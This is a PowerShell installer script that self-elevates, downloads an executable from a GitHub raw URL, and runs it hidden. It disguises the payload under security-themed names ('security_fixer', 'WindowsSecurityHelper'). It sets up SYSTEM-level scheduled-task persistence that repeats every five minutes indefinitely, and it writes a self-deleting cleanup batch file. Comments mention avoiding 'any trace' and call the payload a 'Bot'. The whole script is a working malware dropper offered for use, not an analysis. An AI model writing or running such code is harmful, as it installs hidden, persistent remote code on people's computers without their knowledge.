```powershell
# --- Config ---
$TempFolder = Join-Path $env:TEMP "security_fixer"
if (-not (Test-Path $TempFolder)) { New-Item -Path $TempFolder -ItemType Directory -Force | Out-Null }

$ExeName = "monitoring.exe"
$ExeUrl  = "https://raw.githubusercontent.com/ArthOfficial/TEST/main/securety_fixer.exe"
$ExePath = Join-Path $TempFolder $ExeName
$BatPath = Join-Path $env:TEMP "secfix_un.bat"
$TaskName = "WindowsSecurityHelper"
$LogFile = Join-Path $TempFolder "install.log"

# --- Logging (optional - delete if you don't want any trace) ---
function Log { param($msg) Add-Content -Path $LogFile -Value "$(Get-Date -Format o) - $msg" -ErrorAction SilentlyContinue }

# --- Admin Check & Elevate ---
if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    Start-Process powershell.exe -Verb RunAs -ArgumentList "-ExecutionPolicy Bypass -File `"$PSCommandPath`""
    exit
}

# --- Download monitoring.exe ---
if (-not (Test-Path $ExePath)) {
    try {
        Invoke-WebRequest -Uri $ExeUrl -OutFile $ExePath -UseBasicParsing -ErrorAction Stop
        Log "Downloaded monitoring.exe"
    } catch {
        Log "Download failed: $_"
        exit
    }
}

# --- Create uninstall bat (improved) ---
$BatContent = @'
@echo off
if not defined IS_HIDDEN (start /B "" cmd /c "%~f0" IS_HIDDEN=1 & exit /b)
set LOG=%TEMP%\errors.log
:Kill
taskkill /F /IM monitoring.exe >nul 2>>%LOG%
taskkill /F /IM go.exe >nul 2>>%LOG%
schtasks /delete /tn WindowsSecurityHelper /f >nul 2>>%LOG%
timeout /t 2 >nul
if exist "%TEMP%\security_fixer" rmdir /S /Q "%TEMP%\security_fixer"
if exist "%~f0" del /F /Q "%~f0"
exit
'@

Set-Content -Path $BatPath -Value $BatContent -Encoding ASCII
Log "Created secfix_un.bat"

# --- Create Scheduled Task for Persistence ---
$Action    = New-ScheduledTaskAction -Execute $ExePath
$Trigger1  = New-ScheduledTaskTrigger -AtLogOn
$Trigger2  = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 5) -RepetitionDuration ([timespan]"10675199.02:48:05.4775807")  # 9999 days = forever
$Settings  = New-ScheduledTaskSettingsSet -Hidden -AllowStartOnDemand -RestartCount 3 -RestartInterval (New-TimeSpan -Minutes 1)
$Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest

try {
    Unregister-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue -Confirm:$false
    Register-ScheduledTask -TaskName $TaskName -Action $Action -Trigger $Trigger1,$Trigger2 -Settings $Settings -Principal $Principal -Force | Out-Null
    Log "Created persistent task: $TaskName"
} catch {
    Log "Task creation failed: $_"
}

# --- Run immediately ---
Start-Process -FilePath $ExePath -WindowStyle Hidden
Log "Started monitoring.exe"

# --- Done ---
Log "Installation complete. Bot will auto-start on boot."
```
